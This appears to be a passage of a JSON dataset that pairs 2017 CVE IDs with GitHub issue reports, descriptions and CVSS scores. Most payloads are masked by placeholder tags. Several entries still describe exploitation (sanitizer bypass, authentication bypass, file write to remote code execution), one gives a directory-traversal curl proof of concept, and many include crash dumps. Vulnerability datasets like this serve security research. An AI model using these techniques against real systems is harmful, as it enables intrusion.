        "description": "Bypassing sanitization using DOM clobbering. Proof of concept: CODETAG The following check can be leveraged to bypass the whole sanitization process: APITAG As node is the first child in the created tree walker, i.e. in this case the APITAG tag, APITAG will point to the inner APITAG and the check passes. To learn more about DOM clobbering see: URLTAG (by Mario Heiderich)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-0931",
        "Issue_Url_old": "https://github.com/guardian/html-janitor/issues/34",
        "Issue_Url_new": "https://github.com/guardian/html-janitor/issues/34",
        "Repo_new": "guardian/html-janitor",
        "Issue_Created_At": "2017-10-27T09:49:19Z",
        "description": "Passing user controlled data to APITAG may lead to XSS. The following will result in JS execution: ERRORTAG because of this code: ERRORTAG This implies that passing untrusted user controlled data into the clean method can be very dangerous in some cases. The APITAG HTML\" descriptions seems to imply that \"dirty\" HTML is expected and therefore I would assume the clean method should never result in arbitrary JS being executed.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-1000007",
        "Issue_Url_old": "https://github.com/twisted/txaws/issues/24",
        "Issue_Url_new": "https://github.com/twisted/txaws/issues/24",
        "Repo_new": "twisted/txaws",
        "Issue_Created_At": "2017-01-07T01:56:23Z",
        "description": "security placeholder.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2017-1000048",
        "Issue_Url_old": "https://github.com/ljharb/qs/issues/200",
        "Issue_Url_new": "https://github.com/ljharb/qs/issues/200",
        "Repo_new": "ljharb/qs",
        "Issue_Created_At": "2017-03-02T11:19:08Z",
        "description": "prototype override protection bypass problem still exists.. as the bug URLTAG report fixed, but the other bypass APITAG still exists.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000056",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/43459",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/43459",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2017-03-21T15:22:29Z",
        "description": "placeholder. placeholder",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000070",
        "Issue_Url_old": "https://github.com/bitly/oauth2_proxy/issues/228",
        "Issue_Url_new": "https://github.com/bitly/oauth2_proxy/issues/228",
        "Repo_new": "bitly/oauth2_proxy",
        "Issue_Created_At": "2016-03-26T16:07:36Z",
        "description": "'/' redirect check isn't enough.. PATHTAG is a valid url, so the redirect check at APITAG is not sufficient for its intent. Since I'm using this hole to redirect to other domains within a set of subdomains it would be cool if this was somehow preserved so I can have a partially open redirect. (I'm using an 'auth' domain and redirect to it from other domains and then redirect back while using the nginx aut I plan on writing up the configuration soon for others to use.)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-1000071",
        "Issue_Url_old": "https://github.com/Jasig/phpCAS/issues/228",
        "Issue_Url_new": "https://github.com/apereo/phpcas/issues/228",
        "Repo_new": "apereo/phpcas",
        "Issue_Created_At": "2017-04-06T14:17:04Z",
        "description": "Authentication bypass in APITAG Hello, I found a way to abuse failure message from old CAS server to bypass authentication, even if latest APITAG is used. The CAS NUMBERTAG alidation function is like this: ERRORTAG A normal APITAG message is like this: CODETAG In old CAS server version, it was possible to inject xml tag in the ticket so that the failure message become: CODETAG Now check the php code above and guess what happens: authentication success! The authenticationfailure elements are ignored. Again, this is only possible when latest APITAG is configured to authenticate against old CAS server. Still, that does exist. Some other CAS clients might also be vulnerable, I didn't verify though.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2017-1000072",
        "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/123",
        "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/123",
        "Repo_new": "marcobambini/gravity",
        "Issue_Created_At": "2017-04-07T05:59:36Z",
        "description": "Double Free Vulnerability . I found a Double Free vulnerability while fuzzing Gravity. I have attached the Valgrind output as well. FILETAG ASAN output: > $ PATHTAG PATHTAG > RUNTIME ERROR: Unable to find f2 into class foo NUMBERTAG ERROR: APITAG attempting double free on NUMBERTAG e NUMBERTAG in thread T NUMBERTAG f NUMBERTAG b NUMBERTAG ca in __interceptor_free ( PATHTAG NUMBERTAG e NUMBERTAG in gravity_class_free_internal PATHTAG NUMBERTAG cc7 in gravity_class_free_core PATHTAG NUMBERTAG in gravity_core_free PATHTAG NUMBERTAG a9b1 in main PATHTAG NUMBERTAG f NUMBERTAG b5ef NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG e NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG > freed by thread T0 here NUMBERTAG f NUMBERTAG b NUMBERTAG ca in __interceptor_free ( PATHTAG NUMBERTAG e NUMBERTAG in gravity_class_free_internal PATHTAG > > previously allocated by thread T0 here NUMBERTAG f NUMBERTAG b NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG e2 in string_dup PATHTAG > > SUMMARY: APITAG double free NUMBERTAG interceptor_free NUMBERTAG ABORTING POC: 'WILL ADD' MENTIONTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000073",
        "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/129",
        "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/129",
        "Repo_new": "marcobambini/gravity",
        "Issue_Created_At": "2017-04-10T14:07:16Z",
        "description": "Heap Overflow / Corruption. ERRORTAG Valgrind: ERRORTAG Can provide test case if need be.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000074",
        "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/131",
        "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/131",
        "Repo_new": "marcobambini/gravity",
        "Issue_Created_At": "2017-04-10T22:43:02Z",
        "description": "Stack Overflow APITAG \\ strcpy). There is a stack based buffer overflow in the APITAG function in gravity_core.c. Using the testcase below an attacker can overflow the integers of APITAG as well, use the var to gain complete control of the program's memory. Attached is the Valgrind, ASAN, and GDB output. Would recommend not using strcpy or memcpy unless you can ensure that bounds are being checked on both the dest and src strings. APITAG Valgrind NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./gravity PATHTAG NUMBERTAG Warning: client switching stacks? SP change NUMBERTAG ffeffe NUMBERTAG f0f NUMBERTAG to suppress, use: max stackframe NUMBERTAG or greater NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG D: string_repeat (in PATHTAG NUMBERTAG Address NUMBERTAG f0f NUMBERTAG is on thread NUMBERTAG s stack NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address APITAG NUMBERTAG at NUMBERTAG D: string_repeat (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG Address NUMBERTAG f0f NUMBERTAG is on thread NUMBERTAG s stack NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address APITAG NUMBERTAG at NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault (core dumped) ASAN: ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ffd0a2a NUMBERTAG pc NUMBERTAG d bp NUMBERTAG ffd NUMBERTAG e NUMBERTAG sp NUMBERTAG ffd0a2a NUMBERTAG T NUMBERTAG c in string_repeat ( PATHTAG NUMBERTAG bbcb in gravity_vm_exec ( PATHTAG NUMBERTAG fc NUMBERTAG in gravity_vm_runmain ( PATHTAG NUMBERTAG in main ( PATHTAG NUMBERTAG f NUMBERTAG a2a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) SUMMARY: APITAG stack overflow NUMBERTAG string_repeat GDB: [ registers ] RA NUMBERTAG ef NUMBERTAG RB NUMBERTAG RC NUMBERTAG e8d4a NUMBERTAG RD NUMBERTAG RSI NUMBERTAG d6e0 ('A' <repeats NUMBERTAG times>...) RDI NUMBERTAG fff NUMBERTAG d0 RBP NUMBERTAG fffffffda NUMBERTAG d NUMBERTAG c NUMBERTAG a1d NUMBERTAG a1d0) RSP NUMBERTAG fff NUMBERTAG d0 RIP NUMBERTAG d ( APITAG : call NUMBERTAG APITAG ) R NUMBERTAG R NUMBERTAG d NUMBERTAG a NUMBERTAG a1d NUMBERTAG a1d0) R NUMBERTAG b NUMBERTAG a1d NUMBERTAG a1d0) R NUMBERTAG APITAG R NUMBERTAG b NUMBERTAG R NUMBERTAG R NUMBERTAG fff NUMBERTAG d0 R NUMBERTAG d NUMBERTAG c NUMBERTAG a1d NUMBERTAG a1d0) EFLAGS NUMBERTAG carry parity adjust zero sign trap INTERRUPT direction overflow) [ code NUMBERTAG APITAG : sub rsp,ra NUMBERTAG APITAG : mov rdi,rsp NUMBERTAG a APITAG : mov r NUMBERTAG rsp NUMBERTAG d APITAG : call NUMBERTAG APITAG NUMBERTAG APITAG : mov rcx,QWORD PTR [rbp NUMBERTAG APITAG : lea rax,[rc NUMBERTAG d APITAG : cmp rc NUMBERTAG APITAG : mov QWORD PTR [rbp NUMBERTAG rax Guessed arguments: arg NUMBERTAG fff NUMBERTAG d0 arg NUMBERTAG d6e0 ('A' <repeats NUMBERTAG times>...) [ stack ] Invalid $SP address NUMBERTAG fff NUMBERTAG d0 [ ] Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG d in string_repeat () LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA APITAG RA NUMBERTAG ef NUMBERTAG RB NUMBERTAG RC NUMBERTAG e8d4a NUMBERTAG RD NUMBERTAG RDI NUMBERTAG fff NUMBERTAG d0 RSI NUMBERTAG d6e NUMBERTAG AAAAAAAA') R NUMBERTAG R NUMBERTAG d NUMBERTAG a NUMBERTAG a1d NUMBERTAG a1d0 R NUMBERTAG b NUMBERTAG a1d NUMBERTAG a1d0 R NUMBERTAG R NUMBERTAG b NUMBERTAG R NUMBERTAG R NUMBERTAG fff NUMBERTAG d0 R NUMBERTAG d NUMBERTAG c NUMBERTAG a1d NUMBERTAG a1d0 RBP NUMBERTAG fffffffda NUMBERTAG d NUMBERTAG c NUMBERTAG a1d0 \u25c2\u2014 ... RSP NUMBERTAG fff NUMBERTAG d0 RIP NUMBERTAG d (string_repeat NUMBERTAG call NUMBERTAG APITAG NUMBERTAG d APITAG call strcpy MENTIONTAG APITAG dest NUMBERTAG fff NUMBERTAG d0 src NUMBERTAG d6e NUMBERTAG AAAAAAAA NUMBERTAG APITAG mov rcx, qword ptr [rbp NUMBERTAG APITAG lea rax, [rc NUMBERTAG d APITAG cmp rc NUMBERTAG APITAG mov qword ptr [rbp NUMBERTAG ra NUMBERTAG APITAG je string_repeat NUMBERTAG APITAG NUMBERTAG a APITAG nop word ptr [rax + ra NUMBERTAG APITAG mov rsi, qword ptr [r NUMBERTAG APITAG mov rdi, r NUMBERTAG APITAG add rb NUMBERTAG b APITAG call strcat MENTIONTAG APITAG APITAG APITAG not read memory at NUMBERTAG fff NUMBERTAG d0> APITAG \u25ba f NUMBERTAG d string_repeat NUMBERTAG f NUMBERTAG bbcc gravity_vm_exec NUMBERTAG f NUMBERTAG fc NUMBERTAG gravity_vm_runmain NUMBERTAG f NUMBERTAG main NUMBERTAG f NUMBERTAG ffff NUMBERTAG d NUMBERTAG libc_start_main NUMBERTAG Program received signal SIGSEGV (fault address NUMBERTAG fff NUMBERTAG c8)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000075",
        "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/133",
        "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/133",
        "Repo_new": "marcobambini/gravity",
        "Issue_Created_At": "2017-04-11T12:43:15Z",
        "description": "Stack overflow (memcmp). GDB: CODETAG POC: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000082",
        "Issue_Url_old": "https://github.com/systemd/systemd/issues/6237",
        "Issue_Url_new": "https://github.com/systemd/systemd/issues/6237",
        "Repo_new": "systemd/systemd",
        "Issue_Created_At": "2017-06-29T06:30:08Z",
        "description": "systemd can't handle the process previlege that belongs to user name startswith number, such as NUMBERTAG day. Submission type Bug report systemd version the issue has been seen with > systemd NUMBERTAG Used distribution > Linux ubuntu NUMBERTAG generic NUMBERTAG Ubuntu SMP Thu Apr NUMBERTAG UTC NUMBERTAG APITAG In case of bug report: Expected behaviour you didn't see > The process started by systemd should be user previlege In case of bug report: Unexpected behaviour you saw > The process started by systemd was root previlege In case of bug report: Steps to reproduce the problem linux user's name : APITAG conf file: APITAG CODETAG and then use APITAG to start process, but the previlege is root When I use xinted to start the service, it can start with linux user APITAG previlege",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000097",
        "Issue_Url_old": "https://github.com/golang/go/issues/18141",
        "Issue_Url_new": "https://github.com/golang/go/issues/18141",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2016-12-01T16:38:39Z",
        "description": "embargoed security issue. Placeholder for NUMBERTAG and NUMBERTAG security releases",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000168",
        "Issue_Url_old": "https://github.com/dnaq/sodiumoxide/issues/154",
        "Issue_Url_new": "https://github.com/dnaq/sodiumoxide/issues/154",
        "Repo_new": "dnaq/sodiumoxide",
        "Issue_Created_At": "2017-01-26T12:39:20Z",
        "description": "APITAG supports degenerate public keys (insecure). Currently APITAG accepts all zero public keys, for which the result (DH shared secret) will always be zero regardless of the private key used. Against this, libsodium's APITAG returns a non zero value if it encounters such degenerate keys. You should therefore check its return value when calling APITAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-1000169",
        "Issue_Url_old": "https://github.com/halojoy/QuickerBB/issues/10",
        "Issue_Url_new": "https://github.com/halojoy/quickerbb/issues/10",
        "Repo_new": "halojoy/QuickerBB",
        "Issue_Created_At": "2017-04-28T12:28:12Z",
        "description": "Arbitrary File Write Leading to RCE. Hi, I found that there is an arbitrary file write leading to remote code execution in APITAG (in specific FILETAG ). The exact request that creates an RCE shell in FILETAG is given below: CODETAG install_step3.php writes to FILETAG without actually checking or sanitising what it writes. Also FILETAG is not blocked off by the .htaccess file allowing anyone who has not removed the installation files to be vulnerable to this attack. Remediation I would suggest sanitising the input with something like htmlentities. There are many other ways of doing this, but this would be a quick and easy fix. Another extra layer would be adding the FILETAG file into the htaccess file as not allowed to be viewed. This ensures that even if the file writing is bypassed, the file cannot be executed by an unauthorised user.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000170",
        "Issue_Url_old": "https://github.com/jqueryfiletree/jqueryfiletree/issues/66",
        "Issue_Url_new": "https://github.com/jqueryfiletree/jqueryfiletree/issues/66",
        "Repo_new": "jqueryfiletree/jqueryfiletree",
        "Issue_Created_At": "2017-05-09T01:06:27Z",
        "description": "Security in connectors. The connectors may cause directory traversal attack in the default settings. POC: curl ' FILETAG H APITAG xxx' d \"dir=/\"",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000171",
        "Issue_Url_old": "https://github.com/MaharaProject/mahara-mobile/issues/33",
        "Issue_Url_new": "https://github.com/maharaproject/mahara-mobile-cordova/issues/33",
        "Repo_new": "maharaproject/mahara-mobile-cordova",
        "Issue_Created_At": "2017-05-22T22:25:49Z",
        "description": "Logging of passwords in Mahara from Mahara Mobile. Security fix had been released for mahara Mobile in February NUMBERTAG in commit URLTAG Pawel Kubzdyl uncovered an issue in Mahara Mobile that logged passwords in plain text to the Mahara access log.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000172",
        "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/144",
        "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/144",
        "Repo_new": "marcobambini/gravity",
        "Issue_Created_At": "2017-04-26T02:39:22Z",
        "description": "Heap Double Free / Use After Free. APITAG APITAG CODETAG ERRORTAG ERRORTAG CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000173",
        "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/172",
        "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/172",
        "Repo_new": "marcobambini/gravity",
        "Issue_Created_At": "2017-07-07T16:43:31Z",
        "description": "Gravity Heap Buffer Overflow (list_join). Gravity is vulnerable to a Heap Buffer Overflow that could result in a potentially exploitable condition. Compiled on: Ubuntu NUMBERTAG POC: CODETAG By creating a large loop whiling pushing data to a buffer, we can break out of the bounds checking of that buffer. When APITAG is called on the data it will read past a buffer resulting in a Heap Buffer Overflow. GDB Output: FILETAG Arbitrary write to Heap: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000174",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/21",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/21",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2017-06-11T13:55:26Z",
        "description": "APITAG Address Access Except. crash : URLTAG url trigger : ./swfdump APITAG Crash Detail : ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-1000176",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/23",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/23",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2017-06-11T14:01:50Z",
        "description": "swfc APITAG crash. Crash : URLTAG url Trigger : ./swfc swftools/swfc_crash_mem_put_ Crash Detail : ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-1000182",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/30",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/30",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2017-06-11T14:17:17Z",
        "description": "wa NUMBERTAG swf memory leak. Crash : URLTAG url Trigger : ./wa NUMBERTAG swf APITAG Crash Detail : ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-1000185",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/33",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/33",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2017-06-11T14:30:32Z",
        "description": "gif2swf APITAG memcpy overflow. Crash : URLTAG url Trigger : ./gif2swf r NUMBERTAG o /dev/null z swftools/git2swf_ r NUMBERTAG o_dev_null_ z_memory_corruption__fopen Crash Detail : PATHTAG ./gif2swf r NUMBERTAG o /dev/null z swftools/git2swf_ r NUMBERTAG o_dev_null_ z_memory_corruption__fopen APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG c NUMBERTAG f NUMBERTAG at pc NUMBERTAG ff NUMBERTAG bb NUMBERTAG bp NUMBERTAG fff NUMBERTAG b NUMBERTAG sp NUMBERTAG fff NUMBERTAG b NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG c NUMBERTAG f NUMBERTAG thread T NUMBERTAG ff NUMBERTAG bb NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG b4 in APITAG ( PATHTAG NUMBERTAG a NUMBERTAG in main ( PATHTAG NUMBERTAG ff NUMBERTAG b0e NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG ff8 in _start ( PATHTAG NUMBERTAG c NUMBERTAG f NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG ff NUMBERTAG bba NUMBERTAG in malloc ( PATHTAG NUMBERTAG d5 in APITAG ( PATHTAG ) SUMMARY: APITAG heap buffer overflow NUMBERTAG asan_memcpy Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff8d NUMBERTAG c NUMBERTAG fff8da NUMBERTAG c NUMBERTAG fff8db NUMBERTAG c NUMBERTAG fff8dc NUMBERTAG c NUMBERTAG fff8dd NUMBERTAG c NUMBERTAG fff8de NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG c NUMBERTAG fff8e NUMBERTAG c NUMBERTAG fff8e NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-1000186",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/34",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/34",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2017-06-12T02:31:00Z",
        "description": "pdf2swf stack overflow. Crash : URLTAG url Trigger : ./pdf2swf z i w b l f G I o /den/null swftools/pdf2swf_ z_ i_ w_ b_ l_ f_ G_ I_ APITAG Crash Detail : PATHTAG ./pdf2swf z i w b l f G I o /den/null swftools/pdf2swf_ z_ i_ w_ b_ l_ f_ G_ I_ APITAG ASAN:DEADLYSIGNAL APITAG NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ffc6f NUMBERTAG ff0 (pc NUMBERTAG d NUMBERTAG e bp NUMBERTAG sp NUMBERTAG ffc6f NUMBERTAG ff0 T NUMBERTAG d NUMBERTAG d ( PATHTAG NUMBERTAG e ( PATHTAG NUMBERTAG bd NUMBERTAG PATHTAG NUMBERTAG ce NUMBERTAG PATHTAG NUMBERTAG ce NUMBERTAG PATHTAG NUMBERTAG cfaf ( PATHTAG NUMBERTAG cfc6 ( PATHTAG NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ca NUMBERTAG PATHTAG NUMBERTAG a4c0 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG 